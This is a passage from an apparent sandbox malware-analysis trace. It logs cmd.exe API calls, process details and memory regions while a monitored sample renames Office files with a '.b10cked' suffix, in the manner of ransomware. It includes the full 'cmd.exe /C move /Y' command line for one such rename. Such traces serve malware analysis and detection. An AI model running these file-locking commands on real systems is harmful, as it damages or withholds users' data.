_String2="CMDEXTVERSION") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0168.111] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.111] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.111] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.111] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.111] GetEnvironmentStringsW () returned 0x2b2360* [0168.111] FreeEnvironmentStringsW (penv=0x2b2360) returned 1 [0168.111] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.111] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.111] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.112] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.112] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.112] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.112] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.112] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f700, lpFilePart=0x16f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f6fc*="Desktop") returned 0x18 [0168.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.112] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.112] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.112] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.112] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.113] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.113] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.113] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.113] GetEnvironmentStringsW () returned 0x2b0210* [0168.113] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.114] GetConsoleOutputCP () returned 0x1b5 [0168.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.114] GetUserDefaultLCID () returned 0x409 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f840, cchData=128 | out: lpLCData="1") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.115] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.115] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.116] GetConsoleTitleW (in: lpConsoleTitle=0x2a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.116] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.117] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.117] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.117] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.117] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.117] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.117] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.117] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0168.121] GetConsoleTitleW (in: lpConsoleTitle=0x16f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.256] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.256] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.256] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.256] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.256] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.256] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.256] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.257] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.257] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.257] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.258] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.259] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.260] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0168.260] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0168.260] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0168.260] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapird~1.trx")) returned 0x2020 [0168.261] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.261] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x16ec7c, lpFilePart=0x16ec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", lpFilePart=0x16ec64*="MAPIRD~1.TRX") returned 0x3c [0168.261] SetErrorMode (uMode=0x0) returned 0x1 [0168.261] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.261] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0168.261] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0168.261] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapird~1.trx")) returned 0x2020 [0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.261] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x16f0f8, lpFilePart=0x16ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", lpFilePart=0x16ee90*="MAPIRD~1.TRX") returned 0x3c [0168.261] SetErrorMode (uMode=0x0) returned 0x1 
[0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.262] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f300, lpFilePart=0x16ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x16ee90*="MAPIR.DLL.trx_dll.b10cked") returned 0x49 [0168.262] SetErrorMode (uMode=0x0) returned 0x1 [0168.262] SetLastError (dwErrCode=0x0) [0168.262] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll.b10cked")) returned 0xffffffff [0168.262] GetLastError () returned 0x2 [0168.262] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e80c) returned 0x2b2128 [0168.262] FindNextFileW (in: hFindFile=0x2b2128, lpFindFileData=0x16e80c | out: lpFindFileData=0x16e80c) returned 0 [0168.263] GetLastError () returned 0x12 [0168.263] FindClose (in: hFindFile=0x2b2128 | out: hFindFile=0x2b2128) returned 1 [0168.264] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2b1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1cb8) returned 0x2b2128 [0168.264] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0168.264] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0168.264] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll")) returned 0x2020 [0168.264] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.265] FindClose (in: hFindFile=0x2b2128 | out: hFindFile=0x2b2128) returned 1 [0168.265] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ea58 | out: _Buffer=" 1") returned 9 [0168.265] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.265] GetFileType (hFile=0x7) returned 0x2 [0168.266] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.266] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e9e4 | out: lpMode=0x16e9e4) returned 1 [0168.266] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ea18 | out: lpConsoleScreenBufferInfo=0x16ea18) returned 1 [0168.266] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.267] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") 
returned 0x1a [0168.267] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ea3c*=0x1a) returned 1 [0168.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.267] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.267] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.267] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.267] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.267] SetConsoleInputExeNameW () returned 0x1 [0168.267] GetConsoleOutputCP () returned 0x1b5 [0168.267] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.268] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.268] exit (_Code=0) Process: id = "287" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22724 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000010000" filename = "" Region: id = 22725 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22726 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22727 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22728 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22729 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22730 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22731 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22732 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22733 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22852 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22853 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22854 start_va = 
0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22855 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22856 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22857 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22858 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22861 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22862 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22863 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" 
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22864 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22865 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22876 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22877 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22878 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22879 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 22880 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22881 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22882 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22883 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 22884 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" 
